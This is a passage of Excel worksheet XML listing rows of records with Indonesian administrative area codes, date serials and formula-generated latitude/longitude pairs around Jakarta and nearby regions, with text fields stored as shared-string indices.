        <v>-6.21893,107.05871</v>
      </c>
    </row>
    <row r="1616" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1616">
        <v>109141</v>
      </c>
      <c r="B1616" s="1">
        <v>43886</v>
      </c>
      <c r="C1616">
        <v>0</v>
      </c>
      <c r="D1616" t="s">
        <v>22</v>
      </c>
      <c r="E1616" t="s">
        <v>23</v>
      </c>
      <c r="F1616" t="s">
        <v>5568</v>
      </c>
      <c r="H1616" t="s">
        <v>26</v>
      </c>
      <c r="I1616" t="s">
        <v>5569</v>
      </c>
      <c r="J1616" t="s">
        <v>104</v>
      </c>
      <c r="L1616" t="s">
        <v>5570</v>
      </c>
      <c r="M1616">
        <v>3171100008</v>
      </c>
      <c r="N1616">
        <v>3171100</v>
      </c>
      <c r="O1616">
        <v>3171</v>
      </c>
      <c r="P1616">
        <v>31</v>
      </c>
      <c r="Q1616" t="s">
        <v>107</v>
      </c>
      <c r="R1616" t="s">
        <v>107</v>
      </c>
      <c r="S1616" t="s">
        <v>108</v>
      </c>
      <c r="T1616" t="s">
        <v>33</v>
      </c>
      <c r="U1616" s="5">
        <v>10682920</v>
      </c>
      <c r="V1616" s="5" t="s">
        <v>15914</v>
      </c>
      <c r="W1616" s="5">
        <v>-620765</v>
      </c>
      <c r="X1616" t="s">
        <v>19677</v>
      </c>
      <c r="Y1616" t="str">
        <f t="shared" si="25"/>
        <v>-6.20765,106.82920</v>
      </c>
    </row>
    <row r="1617" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1617">
        <v>109142</v>
      </c>
      <c r="B1617" s="1">
        <v>43886</v>
      </c>
      <c r="C1617">
        <v>0</v>
      </c>
      <c r="D1617" t="s">
        <v>22</v>
      </c>
      <c r="E1617" t="s">
        <v>23</v>
      </c>
      <c r="F1617" t="s">
        <v>5571</v>
      </c>
      <c r="G1617" t="s">
        <v>5572</v>
      </c>
      <c r="H1617" t="s">
        <v>26</v>
      </c>
      <c r="I1617" t="s">
        <v>131</v>
      </c>
      <c r="J1617" t="s">
        <v>5573</v>
      </c>
      <c r="L1617" t="s">
        <v>5574</v>
      </c>
      <c r="M1617">
        <v>3171070005</v>
      </c>
      <c r="N1617">
        <v>3171070</v>
      </c>
      <c r="O1617">
        <v>3171</v>
      </c>
      <c r="P1617">
        <v>31</v>
      </c>
      <c r="Q1617" t="s">
        <v>218</v>
      </c>
      <c r="R1617" t="s">
        <v>121</v>
      </c>
      <c r="S1617" t="s">
        <v>108</v>
      </c>
      <c r="T1617" t="s">
        <v>33</v>
      </c>
      <c r="U1617" s="5">
        <v>10682074</v>
      </c>
      <c r="V1617" s="5" t="s">
        <v>15604</v>
      </c>
      <c r="W1617" s="5">
        <v>-623583</v>
      </c>
      <c r="X1617" t="s">
        <v>19474</v>
      </c>
      <c r="Y1617" t="str">
        <f t="shared" si="25"/>
        <v>-6.23583,106.82074</v>
      </c>
    </row>
    <row r="1618" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1618">
        <v>109143</v>
      </c>
      <c r="B1618" s="1">
        <v>43886</v>
      </c>
      <c r="C1618">
        <v>0</v>
      </c>
      <c r="D1618" t="s">
        <v>22</v>
      </c>
      <c r="E1618" t="s">
        <v>23</v>
      </c>
      <c r="F1618" t="s">
        <v>5575</v>
      </c>
      <c r="H1618" t="s">
        <v>26</v>
      </c>
      <c r="I1618" t="s">
        <v>76</v>
      </c>
      <c r="J1618" t="s">
        <v>5576</v>
      </c>
      <c r="L1618" t="s">
        <v>5577</v>
      </c>
      <c r="M1618">
        <v>3171020001</v>
      </c>
      <c r="N1618">
        <v>3171020</v>
      </c>
      <c r="O1618">
        <v>3171</v>
      </c>
      <c r="P1618">
        <v>31</v>
      </c>
      <c r="Q1618" t="s">
        <v>5306</v>
      </c>
      <c r="R1618" t="s">
        <v>484</v>
      </c>
      <c r="S1618" t="s">
        <v>108</v>
      </c>
      <c r="T1618" t="s">
        <v>33</v>
      </c>
      <c r="U1618" s="5">
        <v>10681218</v>
      </c>
      <c r="V1618" s="5" t="s">
        <v>15724</v>
      </c>
      <c r="W1618" s="5">
        <v>-627864</v>
      </c>
      <c r="X1618" t="s">
        <v>19678</v>
      </c>
      <c r="Y1618" t="str">
        <f t="shared" si="25"/>
        <v>-6.27864,106.81218</v>
      </c>
    </row>
    <row r="1619" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1619">
        <v>109144</v>
      </c>
      <c r="B1619" s="1">
        <v>43886</v>
      </c>
      <c r="C1619">
        <v>0</v>
      </c>
      <c r="D1619" t="s">
        <v>22</v>
      </c>
      <c r="E1619" t="s">
        <v>23</v>
      </c>
      <c r="F1619" t="s">
        <v>5578</v>
      </c>
      <c r="G1619" t="s">
        <v>5579</v>
      </c>
      <c r="H1619" t="s">
        <v>26</v>
      </c>
      <c r="I1619" t="s">
        <v>5580</v>
      </c>
      <c r="J1619" t="s">
        <v>5581</v>
      </c>
      <c r="M1619">
        <v>3174040001</v>
      </c>
      <c r="N1619">
        <v>3174040</v>
      </c>
      <c r="O1619">
        <v>3174</v>
      </c>
      <c r="P1619">
        <v>31</v>
      </c>
      <c r="Q1619" t="s">
        <v>730</v>
      </c>
      <c r="R1619" t="s">
        <v>377</v>
      </c>
      <c r="S1619" t="s">
        <v>32</v>
      </c>
      <c r="T1619" t="s">
        <v>33</v>
      </c>
      <c r="U1619" s="5">
        <v>10678769</v>
      </c>
      <c r="V1619" s="5" t="s">
        <v>15018</v>
      </c>
      <c r="W1619" s="5">
        <v>-616856</v>
      </c>
      <c r="X1619" t="s">
        <v>19679</v>
      </c>
      <c r="Y1619" t="str">
        <f t="shared" si="25"/>
        <v>-6.16856,106.78769</v>
      </c>
    </row>
    <row r="1620" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1620">
        <v>109145</v>
      </c>
      <c r="B1620" s="1">
        <v>43886</v>
      </c>
      <c r="C1620">
        <v>0</v>
      </c>
      <c r="D1620" t="s">
        <v>22</v>
      </c>
      <c r="E1620" t="s">
        <v>23</v>
      </c>
      <c r="F1620" t="s">
        <v>5582</v>
      </c>
      <c r="H1620" t="s">
        <v>26</v>
      </c>
      <c r="I1620" t="s">
        <v>5583</v>
      </c>
      <c r="J1620" t="s">
        <v>2384</v>
      </c>
      <c r="L1620" t="s">
        <v>5584</v>
      </c>
      <c r="M1620">
        <v>3172090006</v>
      </c>
      <c r="N1620">
        <v>3172090</v>
      </c>
      <c r="O1620">
        <v>3172</v>
      </c>
      <c r="P1620">
        <v>31</v>
      </c>
      <c r="Q1620" t="s">
        <v>2283</v>
      </c>
      <c r="R1620" t="s">
        <v>890</v>
      </c>
      <c r="S1620" t="s">
        <v>49</v>
      </c>
      <c r="T1620" t="s">
        <v>33</v>
      </c>
      <c r="U1620" s="5">
        <v>10687642</v>
      </c>
      <c r="V1620" s="5" t="s">
        <v>15915</v>
      </c>
      <c r="W1620" s="5">
        <v>-617776</v>
      </c>
      <c r="X1620" t="s">
        <v>19680</v>
      </c>
      <c r="Y1620" t="str">
        <f t="shared" si="25"/>
        <v>-6.17776,106.87642</v>
      </c>
    </row>
    <row r="1621" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1621">
        <v>109146</v>
      </c>
      <c r="B1621" s="1">
        <v>43886</v>
      </c>
      <c r="C1621">
        <v>0</v>
      </c>
      <c r="D1621" t="s">
        <v>22</v>
      </c>
      <c r="E1621" t="s">
        <v>23</v>
      </c>
      <c r="F1621" t="s">
        <v>5585</v>
      </c>
      <c r="G1621" t="s">
        <v>5586</v>
      </c>
      <c r="H1621" t="s">
        <v>26</v>
      </c>
      <c r="I1621" t="s">
        <v>1710</v>
      </c>
      <c r="J1621" t="s">
        <v>912</v>
      </c>
      <c r="L1621" t="s">
        <v>5587</v>
      </c>
      <c r="M1621">
        <v>3174040001</v>
      </c>
      <c r="N1621">
        <v>3174040</v>
      </c>
      <c r="O1621">
        <v>3174</v>
      </c>
      <c r="P1621">
        <v>31</v>
      </c>
      <c r="Q1621" t="s">
        <v>730</v>
      </c>
      <c r="R1621" t="s">
        <v>377</v>
      </c>
      <c r="S1621" t="s">
        <v>32</v>
      </c>
      <c r="T1621" t="s">
        <v>33</v>
      </c>
      <c r="U1621" s="5">
        <v>10678461</v>
      </c>
      <c r="V1621" s="5" t="s">
        <v>15916</v>
      </c>
      <c r="W1621" s="5">
        <v>-617013</v>
      </c>
      <c r="X1621" t="s">
        <v>19681</v>
      </c>
      <c r="Y1621" t="str">
        <f t="shared" si="25"/>
        <v>-6.17013,106.78461</v>
      </c>
    </row>
    <row r="1622" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1622">
        <v>109147</v>
      </c>
      <c r="B1622" s="1">
        <v>43886</v>
      </c>
      <c r="C1622">
        <v>0</v>
      </c>
      <c r="D1622" t="s">
        <v>22</v>
      </c>
      <c r="E1622" t="s">
        <v>23</v>
      </c>
      <c r="F1622" t="s">
        <v>5588</v>
      </c>
      <c r="G1622" t="s">
        <v>5589</v>
      </c>
      <c r="H1622" t="s">
        <v>26</v>
      </c>
      <c r="I1622" t="s">
        <v>1633</v>
      </c>
      <c r="J1622" t="s">
        <v>912</v>
      </c>
      <c r="L1622" t="s">
        <v>5590</v>
      </c>
      <c r="M1622">
        <v>3174040001</v>
      </c>
      <c r="N1622">
        <v>3174040</v>
      </c>
      <c r="O1622">
        <v>3174</v>
      </c>
      <c r="P1622">
        <v>31</v>
      </c>
      <c r="Q1622" t="s">
        <v>730</v>
      </c>
      <c r="R1622" t="s">
        <v>377</v>
      </c>
      <c r="S1622" t="s">
        <v>32</v>
      </c>
      <c r="T1622" t="s">
        <v>33</v>
      </c>
      <c r="U1622" s="5">
        <v>10678434</v>
      </c>
      <c r="V1622" s="5" t="s">
        <v>15917</v>
      </c>
      <c r="W1622" s="5">
        <v>-616920</v>
      </c>
      <c r="X1622" t="s">
        <v>19682</v>
      </c>
      <c r="Y1622" t="str">
        <f t="shared" si="25"/>
        <v>-6.16920,106.78434</v>
      </c>
    </row>
    <row r="1623" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1623">
        <v>109148</v>
      </c>
      <c r="B1623" s="1">
        <v>43886</v>
      </c>
      <c r="C1623">
        <v>0</v>
      </c>
      <c r="D1623" t="s">
        <v>22</v>
      </c>
      <c r="E1623" t="s">
        <v>23</v>
      </c>
      <c r="F1623" t="s">
        <v>5591</v>
      </c>
      <c r="G1623" t="s">
        <v>5592</v>
      </c>
      <c r="H1623" t="s">
        <v>26</v>
      </c>
      <c r="I1623" t="s">
        <v>5397</v>
      </c>
      <c r="J1623" t="s">
        <v>2627</v>
      </c>
      <c r="L1623" t="s">
        <v>5593</v>
      </c>
      <c r="M1623">
        <v>3216070014</v>
      </c>
      <c r="N1623">
        <v>3216070</v>
      </c>
      <c r="O1623">
        <v>3216</v>
      </c>
      <c r="P1623">
        <v>32</v>
      </c>
      <c r="Q1623" t="s">
        <v>5478</v>
      </c>
      <c r="R1623" t="s">
        <v>5479</v>
      </c>
      <c r="S1623" t="s">
        <v>41</v>
      </c>
      <c r="T1623" t="s">
        <v>42</v>
      </c>
      <c r="U1623" s="5">
        <v>10709377</v>
      </c>
      <c r="V1623" s="5" t="s">
        <v>15918</v>
      </c>
      <c r="W1623" s="5">
        <v>-624456</v>
      </c>
      <c r="X1623" t="s">
        <v>19683</v>
      </c>
      <c r="Y1623" t="str">
        <f t="shared" si="25"/>
        <v>-6.24456,107.09377</v>
      </c>
    </row>
    <row r="1624" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1624">
        <v>109149</v>
      </c>
      <c r="B1624" s="1">
        <v>43886</v>
      </c>
      <c r="C1624">
        <v>0</v>
      </c>
      <c r="D1624" t="s">
        <v>22</v>
      </c>
      <c r="E1624" t="s">
        <v>23</v>
      </c>
      <c r="F1624" t="s">
        <v>5594</v>
      </c>
      <c r="G1624" t="s">
        <v>5595</v>
      </c>
      <c r="H1624" t="s">
        <v>26</v>
      </c>
      <c r="I1624" t="s">
        <v>3652</v>
      </c>
      <c r="J1624" t="s">
        <v>4906</v>
      </c>
      <c r="L1624" t="s">
        <v>5596</v>
      </c>
      <c r="M1624">
        <v>3173010002</v>
      </c>
      <c r="N1624">
        <v>3173010</v>
      </c>
      <c r="O1624">
        <v>3173</v>
      </c>
      <c r="P1624">
        <v>31</v>
      </c>
      <c r="Q1624" t="s">
        <v>4908</v>
      </c>
      <c r="R1624" t="s">
        <v>1481</v>
      </c>
      <c r="S1624" t="s">
        <v>62</v>
      </c>
      <c r="T1624" t="s">
        <v>33</v>
      </c>
      <c r="U1624" s="5">
        <v>10681224</v>
      </c>
      <c r="V1624" s="5" t="s">
        <v>15919</v>
      </c>
      <c r="W1624" s="5">
        <v>-621301</v>
      </c>
      <c r="X1624" t="s">
        <v>19684</v>
      </c>
      <c r="Y1624" t="str">
        <f t="shared" si="25"/>
        <v>-6.21301,106.81224</v>
      </c>
    </row>
    <row r="1625" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1625">
        <v>109150</v>
      </c>
      <c r="B1625" s="1">
        <v>43886</v>
      </c>
      <c r="C1625">
        <v>0</v>
      </c>
      <c r="D1625" t="s">
        <v>22</v>
      </c>
      <c r="E1625" t="s">
        <v>23</v>
      </c>
      <c r="F1625" t="s">
        <v>5597</v>
      </c>
      <c r="G1625" t="s">
        <v>5598</v>
      </c>
      <c r="H1625" t="s">
        <v>26</v>
      </c>
      <c r="I1625" t="s">
        <v>882</v>
      </c>
      <c r="J1625" t="s">
        <v>4273</v>
      </c>
      <c r="M1625">
        <v>3172090006</v>
      </c>
      <c r="N1625">
        <v>3172090</v>
      </c>
      <c r="O1625">
        <v>3172</v>
      </c>
      <c r="P1625">
        <v>31</v>
      </c>
      <c r="Q1625" t="s">
        <v>2283</v>
      </c>
      <c r="R1625" t="s">
        <v>890</v>
      </c>
      <c r="S1625" t="s">
        <v>49</v>
      </c>
      <c r="T1625" t="s">
        <v>33</v>
      </c>
      <c r="U1625" s="5">
        <v>10689277</v>
      </c>
      <c r="V1625" s="5" t="s">
        <v>15920</v>
      </c>
      <c r="W1625" s="5">
        <v>-617492</v>
      </c>
      <c r="X1625" t="s">
        <v>19685</v>
      </c>
      <c r="Y1625" t="str">
        <f t="shared" si="25"/>
        <v>-6.17492,106.89277</v>
      </c>
    </row>
    <row r="1626" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1626">
        <v>109151</v>
      </c>
      <c r="B1626" s="1">
        <v>43886</v>
      </c>
      <c r="C1626">
        <v>0</v>
      </c>
      <c r="D1626" t="s">
        <v>22</v>
      </c>
      <c r="E1626" t="s">
        <v>23</v>
      </c>
      <c r="F1626" t="s">
        <v>5599</v>
      </c>
      <c r="G1626" t="s">
        <v>5600</v>
      </c>
      <c r="H1626" t="s">
        <v>26</v>
      </c>
      <c r="I1626" t="s">
        <v>27</v>
      </c>
      <c r="J1626" t="s">
        <v>5601</v>
      </c>
      <c r="M1626">
        <v>3172030008</v>
      </c>
      <c r="N1626">
        <v>3172030</v>
      </c>
      <c r="O1626">
        <v>3172</v>
      </c>
      <c r="P1626">
        <v>31</v>
      </c>
      <c r="Q1626" t="s">
        <v>5602</v>
      </c>
      <c r="R1626" t="s">
        <v>228</v>
      </c>
      <c r="S1626" t="s">
        <v>49</v>
      </c>
      <c r="T1626" t="s">
        <v>33</v>
      </c>
      <c r="U1626" s="5">
        <v>10690968</v>
      </c>
      <c r="V1626" s="5" t="s">
        <v>15921</v>
      </c>
      <c r="W1626" s="5">
        <v>-629576</v>
      </c>
      <c r="X1626" t="s">
        <v>19686</v>
      </c>
      <c r="Y1626" t="str">
        <f t="shared" si="25"/>
        <v>-6.29576,106.90968</v>
      </c>
    </row>
    <row r="1627" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1627">
        <v>109152</v>
      </c>
      <c r="B1627" s="1">
        <v>43886</v>
      </c>
      <c r="C1627">
        <v>0</v>
      </c>
      <c r="D1627" t="s">
        <v>22</v>
      </c>
      <c r="E1627" t="s">
        <v>23</v>
      </c>
      <c r="F1627" t="s">
        <v>5603</v>
      </c>
      <c r="H1627" t="s">
        <v>26</v>
      </c>
      <c r="I1627" t="s">
        <v>4619</v>
      </c>
      <c r="J1627" t="s">
        <v>5320</v>
      </c>
      <c r="L1627" t="s">
        <v>250</v>
      </c>
      <c r="M1627">
        <v>3175555888</v>
      </c>
      <c r="N1627">
        <v>3175555</v>
      </c>
      <c r="O1627">
        <v>3175</v>
      </c>
      <c r="P1627">
        <v>31</v>
      </c>
      <c r="Q1627" t="s">
        <v>5604</v>
      </c>
      <c r="R1627" t="s">
        <v>5604</v>
      </c>
      <c r="S1627" t="s">
        <v>547</v>
      </c>
      <c r="T1627" t="s">
        <v>33</v>
      </c>
      <c r="U1627" s="5">
        <v>10684418</v>
      </c>
      <c r="V1627" s="5" t="s">
        <v>15922</v>
      </c>
      <c r="W1627" s="5">
        <v>-615280</v>
      </c>
      <c r="X1627" t="s">
        <v>19687</v>
      </c>
      <c r="Y1627" t="str">
        <f t="shared" si="25"/>
        <v>-6.15280,106.84418</v>
      </c>
    </row>
    <row r="1628" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1628">
        <v>109153</v>
      </c>
      <c r="B1628" s="1">
        <v>43886</v>
      </c>
      <c r="C1628">
        <v>0</v>
      </c>
      <c r="D1628" t="s">
        <v>22</v>
      </c>
      <c r="E1628" t="s">
        <v>23</v>
      </c>
      <c r="F1628" t="s">
        <v>5605</v>
      </c>
      <c r="G1628" t="s">
        <v>5606</v>
      </c>
      <c r="H1628" t="s">
        <v>26</v>
      </c>
      <c r="I1628" t="s">
        <v>945</v>
      </c>
      <c r="J1628" t="s">
        <v>5482</v>
      </c>
      <c r="M1628">
        <v>3173080004</v>
      </c>
      <c r="N1628">
        <v>3173080</v>
      </c>
      <c r="O1628">
        <v>3173</v>
      </c>
      <c r="P1628">
        <v>31</v>
      </c>
      <c r="Q1628" t="s">
        <v>4745</v>
      </c>
      <c r="R1628" t="s">
        <v>157</v>
      </c>
      <c r="S1628" t="s">
        <v>62</v>
      </c>
      <c r="T1628" t="s">
        <v>33</v>
      </c>
      <c r="U1628" s="5">
        <v>10682254</v>
      </c>
      <c r="V1628" s="5" t="s">
        <v>15923</v>
      </c>
      <c r="W1628" s="5">
        <v>-616261</v>
      </c>
      <c r="X1628" t="s">
        <v>19688</v>
      </c>
      <c r="Y1628" t="str">
        <f t="shared" si="25"/>
        <v>-6.16261,106.82254</v>
      </c>
    </row>
    <row r="1629" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1629">
        <v>109154</v>
      </c>
      <c r="B1629" s="1">
        <v>43886</v>
      </c>
      <c r="C1629">
        <v>0</v>
      </c>
      <c r="D1629" t="s">
        <v>22</v>
      </c>
      <c r="E1629" t="s">
        <v>23</v>
      </c>
      <c r="F1629" t="s">
        <v>5607</v>
      </c>
      <c r="H1629" t="s">
        <v>26</v>
      </c>
      <c r="I1629" t="s">
        <v>181</v>
      </c>
      <c r="J1629" t="s">
        <v>5608</v>
      </c>
      <c r="L1629" t="s">
        <v>5609</v>
      </c>
      <c r="M1629">
        <v>3172030002</v>
      </c>
      <c r="N1629">
        <v>3172030</v>
      </c>
      <c r="O1629">
        <v>3172</v>
      </c>
      <c r="P1629">
        <v>31</v>
      </c>
      <c r="Q1629" t="s">
        <v>1534</v>
      </c>
      <c r="R1629" t="s">
        <v>228</v>
      </c>
      <c r="S1629" t="s">
        <v>49</v>
      </c>
      <c r="T1629" t="s">
        <v>33</v>
      </c>
      <c r="U1629" s="5">
        <v>10690056</v>
      </c>
      <c r="V1629" s="5" t="s">
        <v>15924</v>
      </c>
      <c r="W1629" s="5">
        <v>-633305</v>
      </c>
      <c r="X1629" t="s">
        <v>19689</v>
      </c>
      <c r="Y1629" t="str">
        <f t="shared" si="25"/>
        <v>-6.33305,106.90056</v>
      </c>
    </row>
    <row r="1630" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1630">
        <v>109155</v>
      </c>
      <c r="B1630" s="1">
        <v>43886</v>
      </c>
      <c r="C1630">
        <v>0</v>
      </c>
      <c r="D1630" t="s">
        <v>22</v>
      </c>
      <c r="E1630" t="s">
        <v>23</v>
      </c>
      <c r="F1630" t="s">
        <v>5610</v>
      </c>
      <c r="G1630" t="s">
        <v>5611</v>
      </c>
      <c r="H1630" t="s">
        <v>26</v>
      </c>
      <c r="I1630" t="s">
        <v>5612</v>
      </c>
      <c r="J1630" t="s">
        <v>3229</v>
      </c>
      <c r="L1630" t="s">
        <v>5613</v>
      </c>
      <c r="M1630">
        <v>3175050002</v>
      </c>
      <c r="N1630">
        <v>3175050</v>
      </c>
      <c r="O1630">
        <v>3175</v>
      </c>
      <c r="P1630">
        <v>31</v>
      </c>
      <c r="Q1630" t="s">
        <v>1012</v>
      </c>
      <c r="R1630" t="s">
        <v>1013</v>
      </c>
      <c r="S1630" t="s">
        <v>547</v>
      </c>
      <c r="T1630" t="s">
        <v>33</v>
      </c>
      <c r="U1630" s="5">
        <v>10690276</v>
      </c>
      <c r="V1630" s="5" t="s">
        <v>15925</v>
      </c>
      <c r="W1630" s="5">
        <v>-616691</v>
      </c>
      <c r="X1630" t="s">
        <v>19690</v>
      </c>
      <c r="Y1630" t="str">
        <f t="shared" si="25"/>
        <v>-6.16691,106.90276</v>
      </c>
    </row>
    <row r="1631" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1631">
        <v>109156</v>
      </c>
      <c r="B1631" s="1">
        <v>43886</v>
      </c>
      <c r="C1631">
        <v>0</v>
      </c>
      <c r="D1631" t="s">
        <v>22</v>
      </c>
      <c r="E1631" t="s">
        <v>23</v>
      </c>
      <c r="F1631" t="s">
        <v>5614</v>
      </c>
      <c r="G1631" t="s">
        <v>5615</v>
      </c>
      <c r="H1631" t="s">
        <v>26</v>
      </c>
      <c r="I1631" t="s">
        <v>1263</v>
      </c>
      <c r="J1631" t="s">
        <v>5616</v>
      </c>
      <c r="L1631" t="s">
        <v>5617</v>
      </c>
      <c r="M1631">
        <v>3171070002</v>
      </c>
      <c r="N1631">
        <v>3171070</v>
      </c>
      <c r="O1631">
        <v>3171</v>
      </c>
      <c r="P1631">
        <v>31</v>
      </c>
      <c r="Q1631" t="s">
        <v>2142</v>
      </c>
      <c r="R1631" t="s">
        <v>121</v>
      </c>
      <c r="S1631" t="s">
        <v>108</v>
      </c>
      <c r="T1631" t="s">
        <v>33</v>
      </c>
      <c r="U1631" s="5">
        <v>10681562</v>
      </c>
      <c r="V1631" s="5" t="s">
        <v>15926</v>
      </c>
      <c r="W1631" s="5">
        <v>-624844</v>
      </c>
      <c r="X1631" t="s">
        <v>19691</v>
      </c>
      <c r="Y1631" t="str">
        <f t="shared" si="25"/>
        <v>-6.24844,106.81562</v>
      </c>
    </row>
    <row r="1632" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1632">
        <v>109157</v>
      </c>
      <c r="B1632" s="1">
        <v>43886</v>
      </c>
      <c r="C1632">
        <v>0</v>
      </c>
      <c r="D1632" t="s">
        <v>22</v>
      </c>
      <c r="E1632" t="s">
        <v>23</v>
      </c>
      <c r="F1632" t="s">
        <v>5618</v>
      </c>
      <c r="G1632" t="s">
        <v>5619</v>
      </c>
      <c r="H1632" t="s">
        <v>26</v>
      </c>
      <c r="I1632" t="s">
        <v>886</v>
      </c>
      <c r="J1632" t="s">
        <v>3135</v>
      </c>
      <c r="L1632" t="s">
        <v>5620</v>
      </c>
      <c r="M1632">
        <v>3671010002</v>
      </c>
      <c r="N1632">
        <v>3671010</v>
      </c>
      <c r="O1632">
        <v>3671</v>
      </c>
      <c r="P1632">
        <v>36</v>
      </c>
      <c r="Q1632" t="s">
        <v>199</v>
      </c>
      <c r="R1632" t="s">
        <v>200</v>
      </c>
      <c r="S1632" t="s">
        <v>201</v>
      </c>
      <c r="T1632" t="s">
        <v>171</v>
      </c>
      <c r="U1632" s="5">
        <v>10670084</v>
      </c>
      <c r="V1632" s="5" t="s">
        <v>15927</v>
      </c>
      <c r="W1632" s="5">
        <v>-624337</v>
      </c>
      <c r="X1632" t="s">
        <v>19692</v>
      </c>
      <c r="Y1632" t="str">
        <f t="shared" si="25"/>
        <v>-6.24337,106.70084</v>
      </c>
    </row>
    <row r="1633" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1633">
        <v>109158</v>
      </c>
      <c r="B1633" s="1">
        <v>43886</v>
      </c>
      <c r="C1633">
        <v>0</v>
      </c>
      <c r="D1633" t="s">
        <v>22</v>
      </c>
      <c r="E1633" t="s">
        <v>23</v>
      </c>
      <c r="F1633" t="s">
        <v>5621</v>
      </c>
      <c r="G1633" t="s">
        <v>5622</v>
      </c>
      <c r="H1633" t="s">
        <v>26</v>
      </c>
      <c r="I1633" t="s">
        <v>166</v>
      </c>
      <c r="J1633" t="s">
        <v>5074</v>
      </c>
      <c r="L1633" t="s">
        <v>5623</v>
      </c>
      <c r="M1633">
        <v>3174060007</v>
      </c>
      <c r="N1633">
        <v>3174060</v>
      </c>
      <c r="O1633">
        <v>3174</v>
      </c>
      <c r="P1633">
        <v>31</v>
      </c>
      <c r="Q1633" t="s">
        <v>5076</v>
      </c>
      <c r="R1633" t="s">
        <v>1762</v>
      </c>
      <c r="S1633" t="s">
        <v>32</v>
      </c>
      <c r="T1633" t="s">
        <v>33</v>
      </c>
      <c r="U1633" s="5">
        <v>10681066</v>
      </c>
      <c r="V1633" s="5" t="s">
        <v>15928</v>
      </c>
      <c r="W1633" s="5">
        <v>-614250</v>
      </c>
      <c r="X1633" t="s">
        <v>19693</v>
      </c>
      <c r="Y1633" t="str">
        <f t="shared" si="25"/>
        <v>-6.14250,106.81066</v>
      </c>
    </row>
    <row r="1634" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1634">
        <v>109159</v>
      </c>
      <c r="B1634" s="1">
        <v>43886</v>
      </c>
      <c r="C1634">
        <v>0</v>
      </c>
      <c r="D1634" t="s">
        <v>22</v>
      </c>
      <c r="E1634" t="s">
        <v>23</v>
      </c>
      <c r="F1634" t="s">
        <v>5624</v>
      </c>
      <c r="H1634" t="s">
        <v>26</v>
      </c>
      <c r="I1634" t="s">
        <v>1758</v>
      </c>
      <c r="J1634" t="s">
        <v>2627</v>
      </c>
      <c r="L1634" t="s">
        <v>5625</v>
      </c>
      <c r="M1634">
        <v>3275050001</v>
      </c>
      <c r="N1634">
        <v>3275050</v>
      </c>
      <c r="O1634">
        <v>3275</v>
      </c>
      <c r="P1634">
        <v>32</v>
      </c>
      <c r="Q1634" t="s">
        <v>4376</v>
      </c>
      <c r="R1634" t="s">
        <v>955</v>
      </c>
      <c r="S1634" t="s">
        <v>41</v>
      </c>
      <c r="T1634" t="s">
        <v>42</v>
      </c>
      <c r="U1634" s="5">
        <v>10696038</v>
      </c>
      <c r="V1634" s="5" t="s">
        <v>15929</v>
      </c>
      <c r="W1634" s="5">
        <v>-625808</v>
      </c>
      <c r="X1634" t="s">
        <v>19694</v>
      </c>
      <c r="Y1634" t="str">
        <f t="shared" si="25"/>
        <v>-6.25808,106.96038</v>
      </c>
    </row>
    <row r="1635" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1635">
        <v>109160</v>
      </c>
      <c r="B1635" s="1">
        <v>43886</v>
      </c>
      <c r="C1635">
        <v>0</v>
      </c>
      <c r="D1635" t="s">
        <v>22</v>
      </c>
      <c r="E1635" t="s">
        <v>23</v>
      </c>
      <c r="F1635" t="s">
        <v>5626</v>
      </c>
      <c r="H1635" t="s">
        <v>26</v>
      </c>
      <c r="I1635" t="s">
        <v>181</v>
      </c>
      <c r="J1635" t="s">
        <v>2384</v>
      </c>
      <c r="L1635" t="s">
        <v>3192</v>
      </c>
      <c r="M1635">
        <v>3172090006</v>
      </c>
      <c r="N1635">
        <v>3172090</v>
      </c>
      <c r="O1635">
        <v>3172</v>
      </c>
      <c r="P1635">
        <v>31</v>
      </c>
      <c r="Q1635" t="s">
        <v>2283</v>
      </c>
      <c r="R1635" t="s">
        <v>890</v>
      </c>
      <c r="S1635" t="s">
        <v>49</v>
      </c>
      <c r="T1635" t="s">
        <v>33</v>
      </c>
      <c r="U1635" s="5">
        <v>10688090</v>
      </c>
      <c r="V1635" s="5" t="s">
        <v>15930</v>
      </c>
      <c r="W1635" s="5">
        <v>-617810</v>
      </c>
      <c r="X1635" t="s">
        <v>19695</v>
      </c>
      <c r="Y1635" t="str">
        <f t="shared" si="25"/>
        <v>-6.17810,106.88090</v>
      </c>
    </row>
    <row r="1636" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1636">
        <v>109161</v>
      </c>
      <c r="B1636" s="1">
        <v>43886</v>
      </c>
      <c r="C1636">
        <v>0</v>
      </c>
      <c r="D1636" t="s">
        <v>22</v>
      </c>
      <c r="E1636" t="s">
        <v>23</v>
      </c>
      <c r="F1636" t="s">
        <v>5627</v>
      </c>
      <c r="G1636" t="s">
        <v>5628</v>
      </c>
      <c r="H1636" t="s">
        <v>26</v>
      </c>
      <c r="I1636" t="s">
        <v>1046</v>
      </c>
      <c r="J1636" t="s">
        <v>2627</v>
      </c>
      <c r="L1636" t="s">
        <v>5629</v>
      </c>
      <c r="M1636">
        <v>3216070013</v>
      </c>
      <c r="N1636">
        <v>3216070</v>
      </c>
      <c r="O1636">
        <v>3216</v>
      </c>
      <c r="P1636">
        <v>32</v>
      </c>
      <c r="Q1636" t="s">
        <v>5527</v>
      </c>
      <c r="R1636" t="s">
        <v>5479</v>
      </c>
      <c r="S1636" t="s">
        <v>41</v>
      </c>
      <c r="T1636" t="s">
        <v>42</v>
      </c>
      <c r="U1636" s="5">
        <v>10708719</v>
      </c>
      <c r="V1636" s="5" t="s">
        <v>15931</v>
      </c>
